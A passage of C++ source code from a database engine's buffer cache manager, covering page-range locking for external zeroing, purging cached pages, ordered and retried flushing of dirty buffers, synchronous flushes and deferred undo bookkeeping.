Expected( pgnoDbLastPostRangeLock >= pbfprl->pgnoDbLast );
Assert( ( pgnoDbLastPostRangeLock <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
HandleError:
if ( err < JET_errSuccess )
{
BFUnlockPageRangeForExternalZeroing( (DWORD_PTR)pbfprl, tc );
*pdwContext = (DWORD_PTR)NULL;
}
else
{
*pdwContext = (DWORD_PTR)pbfprl;
}
return err;
}
void BFPurgeLockedPageRangeForExternalZeroing( const DWORD_PTR dwContext, const TraceContext& tc )
{
BFIPageRangeLock* const pbfprl = (BFIPageRangeLock*)dwContext;
Assert( ( pbfprl != NULL ) && ( pbfprl->rgbfl != NULL ) && ( pbfprl->rgfLatched != NULL ) && ( pbfprl->rgfUncached != NULL ) );
Assert( pbfprl->fRangeLocked );
OnDebug( const PGNO pgnoDbLastPrePurges = g_rgfmp[ pbfprl->ifmp ].PgnoLast() );
Expected( pgnoDbLastPrePurges >= pbfprl->pgnoDbLast );
// If the database grew, the range we are zeroing must be completely below the initial size,
// otherwise, we might have missed latching pages.
Assert( ( pgnoDbLastPrePurges <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
for ( PGNO pgno = pbfprl->pgnoFirst; pgno <= pbfprl->pgnoLast; pgno++ )
{
const size_t ipgno = pgno - pbfprl->pgnoFirst;
Assert( !!FBFInCache( pbfprl->ifmp, pgno ) == !!pbfprl->rgfLatched[ ipgno ] );
if ( !pbfprl->rgfLatched[ ipgno ] )
{
Assert( pgno > g_rgfmp[ pbfprl->ifmp ].PgnoLast() );
continue;
}
BF* const pbf = PBF( pbfprl->rgbfl[ ipgno ].dwContext );
const IFMP ifmp = pbf->ifmp;
Assert( pbf->sxwl.FOwnWriteLatch() );
// If the page is currently clean, clobber it in memory as an empty (zeroed out)
// page. This is necessary because we may lose the lock later when purging pages and
// we don't want a page hanging around in an unknown or divergent (from disk) state in the cache.
if ( pbf->bfdf == bfdfClean )
{
memset( pbf->pv, 0, g_rgcbPageSize[ pbf->icbBuffer ] );
pbf->err = SHORT( ErrERRCheck( JET_errPageNotInitialized ) );
}
BFIPurgeAllPageVersions( &pbfprl->rgbfl[ ipgno ], tc );
pbfprl->rgfLatched[ ipgno ] = fFalse;
}
OnDebug( const PGNO pgnoDbLastPostPurges = g_rgfmp[ pbfprl->ifmp ].PgnoLast() );
Expected( pgnoDbLastPostPurges >= pbfprl->pgnoDbLast );
Assert( ( pgnoDbLastPostPurges <= pbfprl->pgnoDbLast ) || ( pbfprl->pgnoLast <= pbfprl->pgnoDbLast ) );
}
void BFUnlockPageRangeForExternalZeroing( const DWORD_PTR dwContext, const TraceContext& tc )
{
BFIPageRangeLock* const pbfprl = (BFIPageRangeLock*)dwContext;
// Early failures when locking the range.
if ( ( pbfprl == NULL ) || ( pbfprl->rgbfl == NULL ) || ( pbfprl->rgfLatched == NULL ) || ( pbfprl->rgfUncached == NULL ) )
{
goto HandleError;
}
FMP* const pfmp = &g_rgfmp[ pbfprl->ifmp ];
// Rollback range locks if needed.
if ( pbfprl->fRangeLocked )
{
pfmp->RangeUnlockAndLeave( pbfprl->pgnoFirst, pbfprl->pgnoLast, pbfprl->irangelock );
pbfprl->fRangeLocked = fFalse;
}
// Rollback page latches if needed.
for ( PGNO pgno = pbfprl->pgnoFirst; pgno <= pbfprl->pgnoLast; pgno++ )
{
const size_t ipgno = pgno - pbfprl->pgnoFirst;
if ( !pbfprl->rgfLatched[ ipgno ] )
{
continue;
}
BF* const pbf = PBF( pbfprl->rgbfl[ ipgno ].dwContext );
Assert( pbf->sxwl.FOwnWriteLatch() );
if ( pbfprl->rgfUncached[ ipgno ] )
{
BFIPurgeAllPageVersions( &pbfprl->rgbfl[ ipgno ], tc );
}
else
{
BFWriteUnlatch( &pbfprl->rgbfl[ ipgno ] );
}
pbfprl->rgfLatched[ ipgno ] = fFalse;
}
HandleError:
delete pbfprl;
}
void BFPurge( IFMP ifmp, PGNO pgno, CPG cpg )
{
FMP* pfmp = &g_rgfmp[ ifmp ];
PGNO pgnoFirst = ( pgnoNull == pgno ) ? PgnoOfOffset( cpgDBReserved * g_rgcbPageSize[g_icbCacheMax] ) : pgno;
PGNO pgnoLast = ( pgnoNull == pgno ) ? PgnoOfOffset( 0 ) : ( pgno + cpg - 1 );
BOOL fUnlock = fFalse;
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfPurge|sysosrtlContextFmp, pfmp, &ifmp, sizeof(ifmp) );
// quiesce all writes to the specified range of this IFMP via a range lock
//
// NOTE: on an OOM error, we will just skip this as it is an optional step
// designed to help minimize our writes during an error shutdown
if ( pfmp->ErrRangeLock( pgnoFirst, pgnoLast ) >= JET_errSuccess )
{
fUnlock = fTrue;
}
const TICK tickStartPurge = TickOSTimeCurrent();
// evict all cached pages for this IFMP in the range
// why aren't we able to able to make progress on purging these buffers yet? leaked latch?
// we should not be taking more than 5 minutes to be done.
Expected( DtickDelta( tickStartPurge, TickOSTimeCurrent() ) <= 5 * 60 * 1000 );
// scan through all initialized BFs looking for cached pages from this
// IFMP
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
const PBF pbf = PbfBFICacheIbf( ibf );
volatile BF* const pbfT = pbf;
const IFMP ifmpT = pbfT->ifmp;
const PGNO pgnoT = pbfT->pgno;
// if this BF doesn't contain a cached page from this IFMP within
// the given range, skip it now
if ( ifmpT != ifmp || pgnoT < pgnoFirst || pgnoT > pgnoLast )
{
continue;
}
BFIPurgePage( pbf, ifmpT, pgnoT, bfltMax, BFEvictFlags( bfefReasonPurgeContext | bfefEvictDirty | bfefAllowTearDownClean ) );
}
// we are purging all pages in the IFMP
if ( pgnoNull == pgno )
{
// we have an existing BF FMP Context
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp )
{
// test to see if the existing OB0 Index is empty
BOOL fEmpty = fTrue;
BFOB0::CLock lockOB0;
pbffmp->bfob0.MoveBeforeFirst( &lockOB0 );
fEmpty = fEmpty && pbffmp->bfob0.ErrMoveNext( &lockOB0 ) == BFOB0::ERR::errNoCurrentEntry;
pbffmp->bfob0.UnlockKeyPtr( &lockOB0 );
pbffmp->critbfob0ol.Enter();
fEmpty = fEmpty && pbffmp->bfob0ol.FEmpty();
pbffmp->critbfob0ol.Leave();
// we should be empty
Enforce( fEmpty );
// delete our context
pbffmp->bfob0.Term();
pbffmp->BFFMPContext::~BFFMPContext();
OSMemoryHeapFreeAlign( pbffmp );
pfmp->SetDwBFContext( NULL );
}
pfmp->LeaveBFContextAsWriter();
}
// release our range lock
if ( fUnlock )
{
pfmp->RangeUnlock( pgnoFirst, pgnoLast );
}
// wait here until we are sure we are done referencing this FMP or its INST by
// background threads. Remember there are many global background threads like
// scavenge pages / LRU-K, idle flush, or shrink ... not just the inst tied
// checkpoint advancement. We must do this in BFPurge because we may still have
// dirty buffers if this any of (A) a JET_bitTermDirty term, (B) this is a temp
// database ... though there may be mitigations here or (C) if a previous call
// to ErrBFFlush failed / same as termdirty / "error" term.
(void)CBFIssueList::ErrSync();
// wait for non-BF async IO's to complete
pfmp->WaitForAsyncIOForViewCache();
}
BOOL CmpPgno( __in const PGNO& pgno1, __in const PGNO& pgno2 )
{
return pgno1 < pgno2;
}
LOCAL BOOL CmpPgnoPbf( const PGNOPBF& pgnopbf1, const PGNOPBF& pgnopbf2 )
{
return CmpPgno( pgnopbf1.pgno, pgnopbf2.pgno );
}
CAutoResetSignal g_asigBFFlush( CSyncBasicInfo( "g_asigBFFlush" ) );
void BFIPreFlushOrdered( __in const IFMP ifmp, __in const PGNO pgnoFirst, __in const PGNO pgnoLast )
{
LOG * plog = PinstFromIfmp( ifmp )->m_plog;
// tracking variables
ULONG cFlushCycles = 0;
DWORD_PTR cbfFalseHits = 0;
DWORD_PTR cbfRemainingDependencies = 0;
DWORD_PTR cbfPageTouchTooRecent = 0;
DWORD_PTR cbfOutOfMemory = 0;
DWORD_PTR cbfLatchConflict = 0;
DWORD_PTR cbfAbandoned = 0;
DWORD_PTR cbfOtherErr = 0;
// Allocate a working array of buffers + pgnos ...
PGNOPBF * rgpgnopbf = NULL;
LONG_PTR cbfOrderedFlushMax = cbfInit;
LONG_PTR cbfOrderedFlushMac = 0;
while( NULL == ( rgpgnopbf = new PGNOPBF[ cbfOrderedFlushMax ] ) )
{
cbfOrderedFlushMax = cbfOrderedFlushMax / 2;
if ( cbfOrderedFlushMax < 10 )
{
return;
}
}
// attempt to pre-flush the log
// this is to reduce chances of (log flush or LLR) dependency hang-ups in our
// orderly flushing plan.
if ( NULL != plog && !plog->FLogDisabled() )
{
(void)plog->ErrLGUpdateWaypointIFMP( PinstFromIfmp( ifmp )->m_pfsapi, ifmp );
}
// Pre-flush the snapshot so no buffer remains ineligible to flush because of its pre-image
// not being flushed yet.
if ( g_rgfmp[ ifmp ].FRBSOn() )
{
(void)g_rgfmp[ ifmp ].PRBS()->ErrFlushAll();
}
(void)ErrBFIWriteLog( ifmp, fTrue );
// scan through all initialized BFs looking for cached pages from this IFMP
CBFIssueList bfil;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// if this BF doesn't contain a cached page from this IFMP, skip it now
if ( pbf->ifmp != ifmp )
{
continue;
}
// page range check
if ( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) )
{
continue;
}
if ( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) )
{
continue;
}
// enter the pgno+pbf into the working array ...
if ( cbfOrderedFlushMac >= cbfOrderedFlushMax )
{
break; // Ran out of space, lets call that good enough.
}
// it might seem like we can just store only the pbf (and we might be able
// to?), but this would be kind of dangerous to sort() as we have no locks
// so pbf->pgno could change in the middle of the sort() call.
rgpgnopbf[cbfOrderedFlushMac].pgno = pbf->pgno;
rgpgnopbf[cbfOrderedFlushMac].pbf = pbf;
cbfOrderedFlushMac++;
}
// now order all the relevant BFs by offset (i.e. pgno)
std::sort( rgpgnopbf, rgpgnopbf + cbfOrderedFlushMac, CmpPgnoPbf );
// finally let all the BFs file out of the theatre in an orderly manner ...
INT ipgnopbf = 0;
while( ipgnopbf < cbfOrderedFlushMac )
{
// flush out a batch of BFs / pages in order ...
for ( ; ipgnopbf < cbfOrderedFlushMac; ipgnopbf++ )
{
// we re-check it contain a cached page from this IFMP and page range, as qsort might've taken a while
if ( rgpgnopbf[ipgnopbf].pbf->ifmp != ifmp )
{
cbfFalseHits++;
continue;
}
if ( ( pgnoFirst != pgnoNull ) && ( rgpgnopbf[ipgnopbf].pbf->pgno < pgnoFirst ) )
{
cbfFalseHits++;
continue;
}
if ( ( pgnoLast != pgnoNull ) && ( rgpgnopbf[ipgnopbf].pbf->pgno > pgnoLast ) )
{
cbfFalseHits++;
continue;
}
const ERR errFlush = ErrBFIFlushPage( rgpgnopbf[ipgnopbf].pbf, IOR( iorpBFDatabaseFlush ), QosOSFileFromUrgentLevel( qosIODispatchUrgentBackgroundLevelMax / 2 ) );
OSTrace( JET_tracetagBufferManager, OSFormat( "\t[%d]OrderedFlush( %d:%d ) -> %d\n", ipgnopbf, (ULONG)rgpgnopbf[ipgnopbf].pbf->ifmp, (UINT)rgpgnopbf[ipgnopbf].pbf->pgno, errFlush ) );
if ( JET_errSuccess == errFlush ||
errBFIPageFlushed == errFlush ||
errBFIPageFlushPending == errFlush ||
errBFIPageFlushPendingSlowIO == errFlush ||
errBFIPageFlushPendingHungIO == errFlush )
{
// success, get new page ...
//
}
else if ( errDiskTilt == errFlush )
{
// take a breather ...
//
break;
}
// accumulate statistics of other issues ...
else if ( errBFIRemainingDependencies == errFlush ) cbfRemainingDependencies++;
else if ( errBFIPageTouchTooRecent == errFlush ) cbfPageTouchTooRecent++;
else if ( JET_errOutOfMemory == errFlush ) cbfOutOfMemory++;
else if ( errBFLatchConflict == errFlush ) cbfLatchConflict++;
else if ( errBFIPageAbandoned == errFlush ) cbfAbandoned++;
else cbfOtherErr++;
Assert( errBFIPageFlushDisallowedOnIOThread != errFlush );
Assert( wrnBFPageFlushPending != errFlush );
// note: errBFIPageFlushPending[HungIO] could sometimes hide a -256 I think ... should we
// handle that? Letting it go for now ...
}
// now issue, and wait a bit
CallS( bfil.ErrIssue( fTrue ) );
// this retry is pretty hard ... we may have to back off this sleep a little bit
(VOID)g_asigBFFlush.FWait( dtickFastRetry );
cFlushCycles++;
OSTrace( JET_tracetagBufferManager, OSFormat( " OrderlyFlush( %d ) taking a breather!\n", (ULONG)ifmp ) );
}
OSTrace( JET_tracetagBufferManager, OSFormat( "BF: Orderly flush complete for IFMP = %I32u: cbf = %I32u, cFlushCycles = %I32u, cbfFalseHits = %I32u, errors { %I32u, %I32u, %I32u, %I32u, %I32u, %I32u }",
(ULONG)ifmp, (ULONG)cbfOrderedFlushMac, (ULONG)cFlushCycles, (ULONG)cbfFalseHits,
(ULONG)cbfRemainingDependencies, (ULONG)cbfPageTouchTooRecent, (ULONG)cbfOutOfMemory, (ULONG)cbfLatchConflict, (ULONG)cbfAbandoned, (ULONG)cbfOtherErr ) );
delete[] rgpgnopbf;
}
ERR ErrBFFlush( IFMP ifmp, const OBJID objidFDP, const PGNO pgnoFirst, const PGNO pgnoLast )
{
// retry the flush until we have flushed as much of this IFMP as possible
ERR err = JET_errSuccess;
BOOL fRetryFlush = fFalse;
LONG cRetryFlush = 0;
Expected( ( pgnoFirst == pgnoNull ) == ( pgnoLast == pgnoNull ) );
Expected( ( objidFDP == objidNil ) || ( ( pgnoFirst == pgnoNull ) && ( pgnoLast == pgnoNull ) ) );
// for debuggability, in case we get stuck looping below
DWORD_PTR cTooManyOutstandingIOs = 0;
DWORD_PTR cRemainingDependencies = 0;
DWORD_PTR cPagesBeingFlushed = 0;
DWORD_PTR cPageFlushesPending = 0;
DWORD_PTR cLatchConflicts = 0;
DWORD_PTR cPageTouchesTooRecent = 0;
DWORD_PTR cPageFlushesDisallowed = 0;
DWORD_PTR cPagesAbandoned = 0;
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfFlushBegin|sysosrtlContextFmp, &g_rgfmp[ifmp], &ifmp, sizeof(ifmp) );
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "cBFPagesFlushedContextFlush before force-flush: %d [ifmp=0x%x]",
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.GetInstance( PinstFromIfmp( ifmp ) ) ),
ifmp ) );
// we have an optimized version that flushes an FMP's pages in pgno order for a more
// efficient flushing experience.
if ( objidNil == objidFDP && ( g_rgfmp[ ifmp ].Pfapi() == NULL || g_rgfmp[ ifmp ].FSeekPenalty() ) )
{
BFIPreFlushOrdered( ifmp, pgnoFirst, pgnoLast );
}
do {
CBFIssueList bfil;
DWORD_PTR cPageTouchesTooRecentThisRetry = 0;
fRetryFlush = fFalse;
// scan through all initialized BFs looking for cached pages from this
// IFMP
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// if this BF doesn't contain a cached page from this IFMP, skip it now
if ( pbf->ifmp != ifmp )
{
continue;
}
// page range check
if ( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) )
{
continue;
}
if ( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) )
{
continue;
}
// if we're only flushing pages from a specific btree of this IFMP,
// skip any that don't match
if ( objidNil != objidFDP )
{
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireSharedLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
const BOOL fSkip = ( objidFDP != ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP );
pbf->sxwl.ReleaseSharedLatch();
if ( fSkip )
{
continue;
}
}
else
{
// couldn't latch page to check objidFDP, so be
// conservative and DON'T skip this page
//
}
}
// possibly async flush this page
const ERR errFlush = ErrBFIFlushPage( pbf, IOR( iorpBFDatabaseFlush ), QosOSFileFromUrgentLevel( qosIODispatchUrgentBackgroundLevelMax / 2 ) );
OSTrace( JET_tracetagBufferManager, OSFormat( "\t[%d]CleanupFlush( %d:%d ) -> %d\n", (ULONG)ibf, (ULONG)pbf->ifmp, pbf->pgno, errFlush ) );
// there was an error flushing this BF
if ( errFlush < JET_errSuccess )
{
// this BF still has dependencies
if ( errFlush == errBFIRemainingDependencies )
{
// we will need to retry the flush
cRemainingDependencies++;
fRetryFlush = fTrue;
}
// a BF (not necessarily this BF) is being written
//
// NOTE: this can be caused by this BF being flushed or
// by another BF being flushed in its behalf (say for
// removing a flush-order dependency)
else if ( errFlush == errBFIPageFlushed )
{
// we will need to retry the flush to check for
// completion of the write
cPagesBeingFlushed++;
fRetryFlush = fTrue;
}
// a BF (not necessarily this BF) is still being written
else if ( ( errFlush == errBFIPageFlushPending ) || ( errFlush == errBFIPageFlushPendingSlowIO ) || ( errFlush == errBFIPageFlushPendingHungIO ) )
{
// we will need to retry the flush to check for
// completion of the write
cPageFlushesPending++;
fRetryFlush = fTrue;
}
// too much outstanding IO going on
else if ( errFlush == errDiskTilt )
{
// we will need to retry the flush later
cTooManyOutstandingIOs++;
fRetryFlush = fTrue;
cRetryFlush = 0; // interesting we reset this if we fill the disk IO queue ...
break;
}
// there was a latch conflict that prevented us from
// flushing this page
else if ( errFlush == errBFLatchConflict )
{
// we will need to try again later to check this page
cLatchConflicts++;
fRetryFlush = fTrue;
}
else if ( errFlush == errBFIPageTouchTooRecent )
{
// we need to try again after the log rolls, to allow this page to disk
cPageTouchesTooRecent++;
cPageTouchesTooRecentThisRetry++;
fRetryFlush = fTrue;
}
else if ( errFlush == errBFIPageFlushDisallowedOnIOThread )
{
// we shouldn't see this in ErrBFFlush
AssertSz( fFalse, "Shouldn't see errBFIPageFlushDisallowedOnIOThread in " __FUNCTION__ );
cPageFlushesDisallowed++;
fRetryFlush = fTrue;
}
else if ( errFlush == errBFIPageAbandoned )
{
// we need to wait until codepaths that abandon pages are done with them
cPagesAbandoned++;
fRetryFlush = fTrue;
}
// there was some other error
else
{
// save this error if we are not already failing
err = err < JET_errSuccess ? err : errFlush;
}
}
}
// we are going to retry the flush
if ( fRetryFlush )
{
LOG * plog = PinstFromIfmp( ifmp )->m_plog;
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "cBFPagesFlushedContextFlush before retry force-flush: %d [ifmp=0x%x]\r\n"
" cRetryFlush = %d\r\n"
" cTooManyOutstandingIOs = %Iu\r\n"
" cRemainingDependencies = %Iu\r\n"
" cPagesBeingFlushed = %Iu\r\n"
" cPageFlushesPending = %Iu\r\n"
" cLatchConflicts = %Iu\r\n"
" cPageFlushesDisallowed = %Iu\r\n"
" cPageTouchesTooRecent = %Iu\r\n"
" cPageTouchesTooRecentThisRetry = %Iu\r\n"
" cPagesAbandoned = %Iu",
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.GetInstance( PinstFromIfmp( ifmp ) ) ),
ifmp,
cRetryFlush,
cTooManyOutstandingIOs,
cRemainingDependencies,
cPagesBeingFlushed,
cPageFlushesPending,
cLatchConflicts,
cPageFlushesDisallowed,
cPageTouchesTooRecent,
cPageTouchesTooRecentThisRetry,
cPagesAbandoned ) );
// issue any queued writes and log flushes, synchronously if possible
CallS( bfil.ErrIssue( fTrue ) );
// get the waypoint updated so we can flush more buffers
if ( 0 != cPageTouchesTooRecentThisRetry )
{
if ( NULL != plog && !plog->FLogDisabled() )
{
(void)plog->ErrLGUpdateWaypointIFMP( PinstFromIfmp( ifmp )->m_pfsapi, ifmp );
}
// Pre-flush the snapshot so no buffer remains ineligible to flush because of its pre-image
// not being flushed yet.
if ( g_rgfmp[ ifmp ].FRBSOn() )
{
(void)g_rgfmp[ ifmp ].PRBS()->ErrFlushAll();
}
}
// sleep to attempt to resolve outstanding writes and wait for the
// resolution of dependencies based on real time events
(VOID)g_asigBFFlush.FWait( dtickFastRetry );
cRetryFlush++;
}
Assert( bfil.FEmpty() );
}
while ( fRetryFlush );
const ERR errBfFlushLoop = err;
OSTraceFMP(
ifmp,
JET_tracetagBufferManager,
OSFormat( "cBFPagesFlushedContextFlush after force-flush: %d [ifmp=0x%x]\r\n"
" cRetryFlush = %d\r\n"
" cTooManyOutstandingIOs = %Iu\r\n"
" cRemainingDependencies = %Iu\r\n"
" cPagesBeingFlushed = %Iu\r\n"
" cPageFlushesPending = %Iu\r\n"
" cLatchConflicts = %Iu\r\n"
" cPageFlushesDisallowed = %Iu\r\n"
" cPageTouchesTooRecent = %Iu\r\n"
" cPagesAbandoned = %Iu",
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.GetInstance( PinstFromIfmp( ifmp ) ) ),
ifmp,
cRetryFlush,
cTooManyOutstandingIOs,
cRemainingDependencies,
cPagesBeingFlushed,
cPageFlushesPending,
cLatchConflicts,
cPageFlushesDisallowed,
cPageTouchesTooRecent,
cPagesAbandoned ) );
// we have an existing BF FMP Context
FMP* pfmp = &g_rgfmp[ ifmp ];
pfmp->EnterBFContextAsWriter();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp )
{
Assert( pbffmp->fCurrentlyAttached );
// make sure that if we are performing a full flush that there are no
// entries pointing to dirty buffers in the OB0 Index. there can be
// entries pointing to clean buffers because of the way we maintain
// this index
BFOB0::ERR errOB0;
BFOB0::CLock lockOB0;
pbffmp->bfob0.MoveBeforeFirst( &lockOB0 );
while ( pbffmp->bfob0.ErrMoveNext( &lockOB0 ) != BFOB0::ERR::errNoCurrentEntry )
{
PBF pbf;
errOB0 = pbffmp->bfob0.ErrRetrieveEntry( &lockOB0, &pbf );
Assert( errOB0 == BFOB0::ERR::errSuccess );
// while we can have clean buffers, we do not expect evicted (in available or quiesced)
// state buffers to still be in OB0.
AssertTrack( !pbf->fAvailable && !pbf->fQuiesced, "EvictedBufferInOB0" );
AssertTrack( pbf->icbBuffer != icbPage0, "FullyDehydratedBufferInOB0" );
// if we're only flushing pages from a specific btree of this IFMP
// or from a specific range, skip any that don't match
//
// HACK: we are touching the page without the latch!
if ( ( ( objidNil != objidFDP ) &&
( objidFDP != ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP ) ) ||
( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) ) ||
( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) ) )
{
continue;
}
Enforce( err < JET_errSuccess || pbf->bfdf == bfdfClean );
}
pbffmp->bfob0.UnlockKeyPtr( &lockOB0 );
pbffmp->critbfob0ol.Enter();
PBF pbfNext;
for ( PBF pbf = pbffmp->bfob0ol.PrevMost(); pbf != pbfNil; pbf = pbfNext )
{
pbfNext = pbffmp->bfob0ol.Next( pbf );
// if we're only flushing pages from a specific btree of this IFMP
// or from a specific range, skip any that don't match
//
// HACK: we are touching the page without the latch!
if ( ( ( objidNil != objidFDP ) &&
( objidFDP != ( (CPAGE::PGHDR *)( pbf->pv ) )->objidFDP ) ) ||
( ( pgnoFirst != pgnoNull ) && ( pbf->pgno < pgnoFirst ) ) ||
( ( pgnoLast != pgnoNull ) && ( pbf->pgno > pgnoLast ) ) )
{
continue;
}
Enforce( err < JET_errSuccess || pbf->bfdf == bfdfClean );
}
pbffmp->critbfob0ol.Leave();
}
pfmp->LeaveBFContextAsWriter();
// clear OB0 after a full flush (code borrowed from BFPurge())
if ( ( JET_errSuccess <= err ) &&
( objidNil == objidFDP ) &&
( pgnoNull == pgnoFirst ) && ( pgnoNull == pgnoLast ) )
{
// loop until we have cleared OB0 for this IFMP
BOOL fRetry = fFalse;
do {
fRetry = fFalse;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
if ( pbf->ifmp != ifmp )
{
continue;
}
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireExclusiveLatch();
if ( errSXWL == CSXWLatch::ERR::errSuccess )
{
if ( pbf->ifmp == ifmp )
{
BFIResetLgposOldestBegin0( pbf );
}
pbf->sxwl.ReleaseExclusiveLatch();
}
else
{
Assert( errSXWL == CSXWLatch::ERR::errLatchConflict );
fRetry = fTrue;
}
}
if ( fRetry )
{
UtilSleep( dtickFastRetry );
}
}
while ( fRetry );
}
// wait here until we are sure we are done referencing this FMP or its INST by
// background threads. Remember there are many global background threads like
// scavenge pages / LRU-K, idle flush, or shrink ... not just the inst tied
// checkpoint advancement and this call to ErrBFFlush.
(void)CBFIssueList::ErrSync();
if ( err >= JET_errSuccess )
{
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfFlushSucceed|sysosrtlContextFmp, pfmp, &ifmp, sizeof(ifmp) );
}
else
{
ULONG rgul[4] = { (ULONG)ifmp, (ULONG)err, PefLastThrow()->UlLine(), UlLineLastCall() };
OSTraceWriteRefLog( ostrlSystemFixed, sysosrtlBfFlushFail|sysosrtlContextFmp, pfmp, rgul, sizeof(rgul) );
}
Assert( g_rgfmp[ifmp].Pfapi() ||
( PinstFromIfmp( ifmp )->FRecovering() &&
( !g_rgfmp[ifmp].FAttached() ||
g_rgfmp[ifmp].FDeferredAttach() ||
g_rgfmp[ifmp].FSkippedAttach() ) ) ||
( _wcsicmp ( SzParam( PinstFromIfmp( ifmp ), JET_paramRecovery ), wszOn ) != 0 ) ||
( !PinstFromIfmp( ifmp )->m_fJetInitialized ) );
if ( err >= JET_errSuccess && g_rgfmp[ifmp].Pfapi() )
{
err = ErrIOFlushDatabaseFileBuffers( ifmp, iofrFlushIfmpContext );
}
// return the result of the flush operation
AssertTrack( errBfFlushLoop >= JET_errSuccess || err == errBfFlushLoop, "ErrBFFlushLostFlushLoopErr" ); // ensure we don't clobber the proper flush error.
return err;
}
ERR ErrBFFlushSync( IFMP ifmp )
{
ERR err = JET_errSuccess;
// scan through all initialized BFs looking for cached pages from this
// IFMP
CBFIssueList bfil;
for ( IBF ibf = 0; ibf < cbfInit; ibf++ )
{
PBF pbf = PbfBFICacheIbf( ibf );
// if this BF doesn't contain a cached page from this IFMP, skip it now
if ( pbf->ifmp != ifmp )
{
continue;
}
// if we can't exclusively latch this BF, skip it now
if ( pbf->sxwl.ErrTryAcquireExclusiveLatch() != CSXWLatch::ERR::errSuccess )
{
continue;
}
// if this BF is undergoing IO, skip it now
if ( !FBFIUpdatablePage( pbf ) )
{
pbf->sxwl.ReleaseExclusiveLatch();
continue;
}
// if this BF is clean, skip it now
if ( pbf->bfdf == bfdfClean )
{
pbf->sxwl.ReleaseExclusiveLatch();
continue;
}
// if this BF has a dependency of any kind whatsoever, fail the flush
const ERR errPrepareFlush = ErrBFIPrepareFlushPage( pbf, bfltExclusive, IOR( iorpBFDatabaseFlush ), qosIODispatchImmediate, fFalse );
if ( errPrepareFlush < JET_errSuccess )
{
pbf->sxwl.ReleaseExclusiveLatch();
OSTrace(
JET_tracetagBufferManager,
OSFormat( "ErrBFIPrepareFlushPage: pgno=%u:%u errPrepareFlush=%d", (ULONG)pbf->ifmp, pbf->pgno, errPrepareFlush ) );
if ( errPrepareFlush == JET_errOutOfMemory || errPrepareFlush == JET_errOutOfBuffers )
{
Error( errPrepareFlush );
}
else
{
Error( ErrERRCheck( JET_errDiskIO ) );
}
}
Assert( !bfil.FEmpty() ); // log should've flushed.
// write this BF to the database
TraceContextScope tcScope( iorpBFDatabaseFlush );
err = ErrBFISyncWrite( pbf, bfltExclusive, qosIODispatchImmediate, *tcScope );
pbf->sxwl.ReleaseExclusiveLatch();
if ( err < JET_errSuccess )
{
Call( err );
}
}
HandleError:
// issue any queued writes and log flushes, synchronously if possible
CallS( bfil.ErrIssue( fTrue ) );
return err;
}
///////////////////////////////
// Deferred Undo Information
void BFAddUndoInfo( const BFLatch* pbfl, RCE* prce )
{
// validate IN args
Assert( FBFWARLatched( pbfl ) || FBFWriteLatched( pbfl ) );
Assert( prce->PgnoUndoInfo() == pgnoNull );
Assert( prce->PrceUndoInfoNext() == prceInvalid );
// add the undo info to the BF
PBF pbf = PBF( pbfl->dwContext );
ENTERCRITICALSECTION ecs( &g_critpoolBFDUI.Crit( pbf ) );
BFIAddUndoInfo( pbf, prce );
}
void BFRemoveUndoInfo( RCE* const prce, const LGPOS lgposModify )
{
// validate IN args
Assert( prce != prceNil );
// try forever to remove the deferred undo information in this RCE
while ( prce->PgnoUndoInfo() != pgnoNull )
{
// the IFMP / PGNO of the undo info in this RCE is in the cache
//
// NOTE: as long as we hold the read lock on this IFMP / PGNO, any
// BF we find cannot be evicted
BFHash::CLock lockHash;
g_bfhash.ReadLockKey( IFMPPGNO( prce->Ifmp(), prce->PgnoUndoInfo() ), &lockHash );
PGNOPBF pgnopbf;
if ( g_bfhash.ErrRetrieveEntry( &lockHash, &pgnopbf ) == BFHash::ERR::errSuccess )
{
// lock the undo info chain on this BF
CCriticalSection* const pcrit = &g_critpoolBFDUI.Crit( pgnopbf.pbf );
pcrit->Enter();
// the IFMP / PGNO of the undo info in this RCE has undo info on
// this page
if ( prce->PgnoUndoInfo() == pgnopbf.pbf->pgno &&
prce->Ifmp() == pgnopbf.pbf->ifmp )
{
// this page has no versions
if ( pgnopbf.pbf->pbfTimeDepChainNext == pbfNil )
{
#ifdef DEBUG
// we know that the undo info must be on this BF
RCE* prceT;
for ( prceT = pgnopbf.pbf->prceUndoInfoNext;
prceT != prceNil && prceT != prce;
prceT = prceT->PrceUndoInfoNext() )
{
}
Assert( prceT == prce );
#endif // DEBUG
// if we are removing this undo info as a part of a lazy commit,
// we must depend the page on the commit record. this is so
// that if we log the commit record, remove the undo info,
// flush the page, and then crash before flushing the commit
